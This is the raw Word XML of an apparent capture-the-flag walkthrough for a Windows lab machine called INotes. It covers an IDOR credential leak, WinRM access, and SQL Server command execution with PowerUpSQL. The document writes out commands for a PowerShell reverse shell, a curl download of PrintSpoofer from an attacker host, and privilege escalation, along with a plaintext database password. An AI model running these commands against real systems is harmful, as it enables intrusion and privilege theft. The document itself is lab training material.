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md5x29xlq8d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gjyyfwyiu02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14w17qy9exum" w:id="2"/>
      <w:bookmarkEnd w:id="2"/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INOTES machine.If you require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c1a14pjbaq4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Nmap Scan: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need to determine which services are running in the background and which ports are open. Therefore, we will use a tool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running the tool, we identified several open ports typical of a Windows system. In particular, we noticed that there is a web service running on port 80.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5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web application, we confirmed that it is a note-taking system. We can create an account and log into the platform.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creating an account in the note application, we can observe that when accessing a specific note, the URL contains a unique identifier (ID). This structure suggests the possibility of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Insecure Direct Object Reference (IDOR)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this vulnerability, we need to intercept the request corresponding to viewing a specific note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After intercepting the request, we forward it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Intruder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where we configure the attack to iterate over different IDs.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0" l="0" r="0" t="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performing the IDOR attack, we identified a note with ID 97. When accessing the content of this note, we obtained the credentials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"john"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 LDAP access.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obtaining john’s LDAP credentials, we can test them to gain access to the server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 Remote Management (WinRM)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Evil-WinRM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https://github.com/Hackplayers/evil-winrm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gaining access to the server using Evil-WinRM, we can navigate to the Desktop directory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"john"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retrieve the first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300"/>
            <wp:effectExtent b="0" l="0" r="0" t="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the directory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C:\xampp\htdocs\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identified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mssql.xml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Upon examining its contents, we found the SQL Server database credentials.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the obtained credentials, we can use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PowerUpSQL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 to interact with SQL Server. After establishing a connection to the database, we can execute commands within the context of the service account, allowing us to obtain a shell with that user’s privileges.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tool can be accessed at the following link:</w:t>
        <w:br w:type="textWrapping"/>
      </w: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https://raw.githubusercontent.com/NetSPI/PowerUpSQL/refs/heads/master/PowerUpSQL.ps1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00200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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downloading the file mentioned above, we can transfer it to the server using the command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upload &lt;file&gt;.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0" l="0" r="0" t="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 we can import the module and then execute the command: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Invoke-SQLOSCmd -Username dbuser -Password r23ExYogXLBkh4CzbCFV5HLq77tO276H8K -Instance "EC2AMAZ-76KN0U2\SQLEXPRESS" -Command whoami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executing the command, we can observe the output.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information, we can obtain a shell as the service user. For this, we use the website below to generate a PowerShell reverse shell payload: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2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https://www.revshells.com/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6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completing the steps above, we can execute the following command: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color w:val="188038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color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Invoke-SQLOSCmd -Username dbuser -Password r23ExYogXLBkh4CzbCFV5HLq77tO276H8K -Instance "EC2AMAZ-76KN0U2\SQLEXPRESS" -Command "powershell -e &lt;payload&gt;"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executing the command above, we receive a shell as the service account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mssql$sqlexpress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4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running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whoami /all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verify that the service account has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SeImpersonatePrivilege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privilege. This privilege allows the user to impersonate other accounts, facilitating privilege escalation. An effective tool to exploit this vulnerability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PrintSpoofer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2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https://github.com/itm4n/PrintSpoofer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11400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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downloading the tool to the local machine, we can host the file using a Python HTTP server. Then, we use the command below to transfer the tool to the target server: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0" l="0" r="0" t="0"/>
            <wp:docPr id="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cmd /c curl http://&lt;vpn-ip&gt;/PrintSpoofer64.exe -o C:\Users\Public\Documents\PrintSpoofer64.exe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03300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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tool available on the server, we can execute the following command to obtain a shell with elevated privileges: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.\PrintSpoofer64.exe -c "powershell -e &lt;payload-reverse&gt;"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can reuse the same reverse shell payload used previously.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Netcat listener to receive the connection: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  <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="914400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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executing the command, we receive the shell.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36600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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6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Now, we simply navigate to the Desktop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to retrieve the final flag.</w:t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heading=h.o115zspbfxns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References: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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId35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https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet</w:t>
          <w:br w:type="textWrapping"/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId3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https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/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headerReference r:id="rId39" w:type="even"/>
      <w:footerReference r:id="rId40" w:type="default"/>
      <w:footerReference r:id="rId41" w:type="first"/>
      <w:footerReference r:id="rId42" w:type="even"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="0" w:left="1440" w:right="1440" w:header="0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All rights reserved </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">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>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o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9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jc w:val="center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INotes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0910"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="4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09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6.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.revshells.com/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15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2.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/itm4n/PrintSpoof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9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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Hackplayers/evil-winrm" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/NetSPI/PowerUpSQL/refs/heads/master/PowerUpSQL.ps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kNqq0l8F6tR7OmGhN/ybWBLKw==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLjZnanl5Znd5aXUwMjIOaC4xNHcxN3F5OWV4dW0yDmgucWMxYTE0cGpiYXE0Mg5oLm8xMTV6c3BiZnhuczIOaC4xNzVmNWNzOTR6MG84AHIhMXVHazZEZWwtQmFlVTZXdVlHd0ZWNC00RmtlOVBFX2wt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